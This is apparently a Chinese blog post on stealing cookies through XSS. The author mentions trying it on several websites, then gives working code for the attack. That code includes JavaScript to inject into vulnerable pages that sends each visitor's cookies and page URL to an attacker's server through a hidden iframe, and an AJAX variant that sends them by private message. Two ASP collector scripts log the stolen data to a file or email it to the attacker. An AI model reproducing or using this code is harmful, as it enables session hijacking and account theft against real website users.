利用xss漏洞盗取cookies

下午有空看了看相关的内容，顺手试了几个站。刚好学习一下盗取cookies的技巧。

下面是整理的一些源代码，

相关源代码：

客户端(建一个js，在有漏洞的网页上提交引用代码” document.write("<script src=XX.js></script>") “）

var code;
var target = "http://www.xxx.net/cookie.asp?";
info=escape(document.location+"@@@"+document.cookie);
target=target+info;
code="<iframe style='display:none;' src=";
code=code+target;
code=code+" width=0 height=0></iframe>";
document.write(code);

---为了隐藏一点，防止别人改密码了。甚至可以用ajax

var XMLHTTPRequestObject = false;
if (window.XMLHttpRequest) {
XMLHttpRequestObject = new XMLHttpRequest();
} else if(window.ActiveXObject) {
XMLHttpRequestObject = new ActiveXObject("Microsoft.XMLHTTP");
}else{
alert("Javascript must be enabled to continue.");
}
function socket()
{
XMLHttpRequestObject.open('GET', 'http://www.site.com/privatemessage.php?
user=yourusername&subject=' + window.document.cookie, true);
XMLHttpRequestObject.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
XMLHttpRequestObject.send(null);
delete XMLHttpRequestObject;
}
window.document.onload='socket();

服务端 （就是客户端中提到的cookie.asp可放于自已网站）

dim fso,file,str
str=unescape(request.Servervariables("QUERY_STRING"))
Const ForReading = 1, ForWriting = 2, ForAppending = 8
Set fso = Server.CreateObject("Scripting.FileSystemObject")
path = server.mappath("xxx.txt")
set file=fso.opentextfile(path, ForAppending, TRUE)
file.write("Xss:")
file.write(str)
file.write vbCrLf
file.close
set file = nothing
set fso = nothing

－－还有另一个版本（让他自动发送邮件，需jmail支持）

<%
SaveFile="pass.txt" '保存获取数据的TXT
IfSendMail=true '是否使用邮件发送,如果True则发送邮件不保存TXT 如果false则保存txt而不发送邮件
YourSendMail="****@163.com" '用来发送的邮箱
YourSendMailUser="****" '邮箱登陆用户名
YourSendMailPass="****" '邮箱登陆密码 (以上3项邮箱、账号、密码改成自己的)
YourSendMailServer="smtp.163.com" '邮件服务器
YourMailTitle="有新截获的数据来了!" '邮件标题
YourRecvMail="xxxx@qq.com" '收取截获数据的邮箱，建议使用QQ邮箱,可以实时提示,让你第时间得到要的信息

sub sendmail(content)
On error resume next
dim JMail
Set JMail = Server.CreateObject("JMail.Message")
JMail.Logging = True
JMail.Charset = "gb2312"
JMail.ContentType = "text/html"
JMail.From = YourSendMail
JMail.FromName = ""&YourSendMailUser
JMail.MailServerUserName = YourSendMailUser
JMail.MailServerPassword = YourSendMailPass
JMail.Priority = 1
JMail.AddRecipient YourRecvMail
JMail.Subject = YourMailTitle
JMail.Body = content
JMail.Send("smtp.163.com")
Set JMail = nothing
If err then
Response.write "发送失败!请检查配置!并确认你的服务器是否支持Jmail!"
else
Response.write "发送成功!"
end if
end sub

GetPostStr=Request.QueryString
if GetPostStr="" then
Response.write "None!"
end if

if ifsendmail then
StrTemp=Replace(GetPostStr,"=",":")
StrTemp=Replace(StrTemp,"&","<br>")
sendmail(StrTemp)
else
set F=server.CreateObject("scripting.filesystemobject")
set I=F.OpenTextFile(server.mappath(SaveFile),8,True,0)
TempStr=Split(GetPostStr,"&")
for TempI=0 To Ubound(TempStr)
I.WriteLine(Replace(TempStr(TempI),"=",":"))
next
I.WriteLine(now())
I.WriteLine("--------------------------------")
I.close
Set F=nothing
end if
%>

相关文章

• 补上昨天的日志，xss漏洞 (0)

文章中包含标签:cookies, xss漏洞